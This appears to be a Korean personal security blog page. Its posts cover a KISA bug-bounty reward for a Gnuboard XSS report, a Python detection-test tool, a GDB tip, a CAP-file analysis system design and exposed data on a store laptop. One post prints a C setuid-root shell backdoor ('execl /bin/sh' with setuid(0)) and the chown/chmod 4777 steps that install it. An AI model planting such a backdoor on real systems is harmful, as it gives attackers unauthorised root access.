반응형

운이 좋게도..
어찌저찌해서 그누보드 XSS 취약점을 제보.

메일이 오네요..
어제는 보상 관련 메일이 왔습니다.


덕분에.. 술마실 정도의 돈이 생겼어요 ^^;


취약점 찾으시는 분들은.. KISA 에 꼭 제보하세요!!

(용돈이 생깁니다.)


Thanks to 강섭이형.~







반응형

'작업공간 > Security' 카테고리의 다른 글

휘슬(WHISTL) 3탄~  (4) 2013.01.14
서강대 정보통신대학원 해킹??  (2) 2013.01.14
탐지TEST용 도구  (0) 2012.05.18
GDB Intel Achi 보는 방법  (0) 2012.05.07
CAP 파일 분석 시스템  (7) 2012.04.06
반응형


반응형
반응형

Nullege is a search engine for Python source code.


http://nullege.com/


파이썬 코드를 검색할 수 있는 사이트.

MSDN 같은 느낌이라 참 좋다.

반응형

'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

2012년 12월 19일 해커와의 대화  (2) 2013.01.10
Secuinside 예선  (0) 2012.06.11
Cool Messenger 연구  (0) 2012.04.24
롯데마트에선 안파는게 없군요.  (0) 2012.04.23
음?? 당했나?  (3) 2012.03.15
반응형

업무상.. 탐지TEST용 도구가 필요해서 python으로 개발하고 wxPython으로 GUI를 입혔습니다.


wxPython은 처음해보는데.. 원하는 코드들이 검색이 제맘대로 안되서 고생을 엄청했네요.. ㅠㅠ


아래는 구 GUI 모습..


StaticBox랑 StaticText에서 값을 어떻게 전달 받는지 몰라서.. 헤맨게.. 언.. 5시간 ㅠㅠ



구성도는 아래와 같습니다.



순서

1. py_client.py 에서 탐지문자열 및 Flow, Port 지정

2. py_client.py 에서 Port Open 명령 전달

3. py_auto_openport.py 에서 전달받은 Port 로 서버(py_server.py) 실행

4. py_client.py 에서 py_server.py 로 패턴 전송

5. py_client.py 와 py_server.py 가 3 way-handshake 를 맺으며 통신

6. 네트워크 탐지장비에서 탐지

7. 통신이 끝나면 py_server.py 종료



보완점

1. TCP만 구현해놓음.

2. 패킷덤프파일(cap)을 입력값으로 받아 서로 통신할 수 있도록 구현하면 좋음.


반응형

'작업공간 > Security' 카테고리의 다른 글

서강대 정보통신대학원 해킹??  (2) 2013.01.14
KISA 포상금제도  (8) 2012.12.14
GDB Intel Achi 보는 방법  (0) 2012.05.07
CAP 파일 분석 시스템  (7) 2012.04.06
wargame - maze game  (3) 2012.03.09
반응형

자꾸 까먹어서 큰일..


set disassembly-flavor intel

반응형

'작업공간 > Security' 카테고리의 다른 글

KISA 포상금제도  (8) 2012.12.14
탐지TEST용 도구  (0) 2012.05.18
CAP 파일 분석 시스템  (7) 2012.04.06
wargame - maze game  (3) 2012.03.09
wargame - regex?!  (0) 2012.03.09
반응형

기록용.

쿨메신저란 지란지교사에서 만든 메신저 프로그램이다.

현재 학교 및 기업, 공공기관에서 꽤 많이 사용중인 프로그램으로 알고 있다.


쿨메신저는 몇몇 사이트에 판매할때 커스텀마이징을 거쳐서 사이트마다 버전이 다르기도 하다.


연구이유 : 지란지교소프트에서 판매한 몇몇 소프트웨어들은 취약하다.

공격영향 : 개인정보 및 APT


결과가 나올 수 있을꺼같기도하고.. 아닐것도 하고..

일단 Keep.


V1ZWb1UwMUhUa1ZpTTFwTlRUSlJlbHBJYXpGamJIQjFWVzFvVFdKVWJEVlVSekV3WlZWM2VWUnVXbWxOYm1ReVdWWmpNV1Z0VWtoU2JrNXBVWHBXZGxwRlkzaGpkejA5




반응형

'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

Secuinside 예선  (0) 2012.06.11
Nullege is a search engine for Python source code.  (0) 2012.05.23
롯데마트에선 안파는게 없군요.  (0) 2012.04.23
음?? 당했나?  (3) 2012.03.15
setuid(0) 설정.  (1) 2012.03.15
반응형

롯데마트에 구경을 갔다가..


전시되어 있는 노트북을 보는데..


바탕화면에 엑셀파일이....쫘악.....................


엑셀파일을 열어보니 아래처럼 정보들이 쫘악........................


노트북 구매하면 개인정보와 매장별 매출정보들도 주시는건가요? ^^




반응형
반응형

네트워크 회사에 있다보니 CAP 파일이 굉장히 중요하다.

근데 CAP 파일 분석툴이 없다.

좀 더 정확히 이야기 하면 "CAP 파일 내부의 어떤 코드가 취약하고 어떤 악성코드가 심어졌고.." 라는 것을 의미한다.

"그걸 분석해서 뭐하려고?" 라고 이야기 할지는 모르겠지만

EXE 분석툴, SWF 분석툴.. 등 다양한 포멧을 분석할 수 있는 툴들이 많다.

하지만 왜 CAP 파일 분석툴은 없을까.. 라고 고민하게되었고 설계하고자 한다.

일단 CAP 파일을 분석하려면 아래와 같은 조건이 선행되어야 한다고 생각한다.


1. 세션별 트래픽 분류

2. 데이터 값에 대한 File format 확인 (파일종류 확인)

3. 다양한 취약점에 대한 이해

4. 결과값들의 연관관계


사실 정확히 이야기 하면 CAP 파일 분석툴은 필요가 없다.

해당 컴퓨터 내부에서 프로그램으로 동작하면 되는것이 아닌가..

하지만.. 내 실력이 미천하여.. CAP 파일을 생성한 이후, 그 CAP 파일을 분석하는 형태로 구성을 계획중이다.

해당 툴이 완성되면 아래와 같은 Flow로 분석을 진행할 예정이다.


ex) "취약점분석시스템"이란 제작할 툴을 이용하여 만들 시스템으로 웹서버로 URL을 받아들여 분석하는 시스템이다.

1. 보안관제 혹은 보안에 관심있는 사람들이 "취약점분석시스템"에 접근하여 URL을 입력한다.

2. 입력된 URL은 내부에 있는 가상머신을 통해 접근하게되며, 접근할 때 네트워크 트래픽을 덤프한다. (CAP)

3. 약 20초간 딜레이 -> CAP 파일 백업 -> Snapshot 복원

4. 생성된 CAP 파일을 분석툴을 이용하여 분석한다.

5. 분석툴은 내부적으로 알려진 취약점 및 악성코드, 경유지, 유포지 등을 수집/분석한다.

6. 수집/분석 된 결과를 "취약점분석시스템"에 보여준다.



이로 인해 예상되는 이익은 아래와 같다.

1. 분석시스템의 자동화로 인해 업무효율 상승

2. 신종 공격 발견 시간 단축

3. 악성파일 및 악성스크립트 수집

4. 알려진 공격과 알려지지 않은 신종공격에 대해 실시간으로 구별가능.

5. 샘플에 대한 처리률 상승


만들고는 있는데.. 언제쯤 완성될런지는..

일단 담주 금요일까지 완성을 목표로.~



반응형

'작업공간 > Security' 카테고리의 다른 글

탐지TEST용 도구  (0) 2012.05.18
GDB Intel Achi 보는 방법  (0) 2012.05.07
wargame - maze game  (3) 2012.03.09
wargame - regex?!  (0) 2012.03.09
ructf  (1) 2012.03.09
반응형
보안업체 같은데.. 당한건가? -_-ㅋ;;



반응형
반응형
어떤 X친놈이..
소스코드를 올렸다.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void){
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0);
}

컴파일을 한 이후..
소유권자를.. 없는 계정인.. 500:users 로 설정했다.. -_-;;

chown 500:users backdoor

그 다음 예상한대로 setuid 설정을 한다.

chmod 4777 backdoor

그대로 따라해봤다............
.
.
.
.
.


........
!%@!($&!@(*$!@)

안되자나............ 응?? 안되자나.................. 응???

도대체 넌 무슨 목적으로 없는 사용자인 500과 users라는 사용자 이름으로 권한을 준거니...?

니가 재정신이였으면.. root:root 로 설정했어야지.. 무슨 생각이니..???

대답 좀 해주렴.. 형이 궁금해서 그래...................

내가 모르는게 있는거니..?;;

아오.. 스트뤠쓰~~~



반응형

+ Recent posts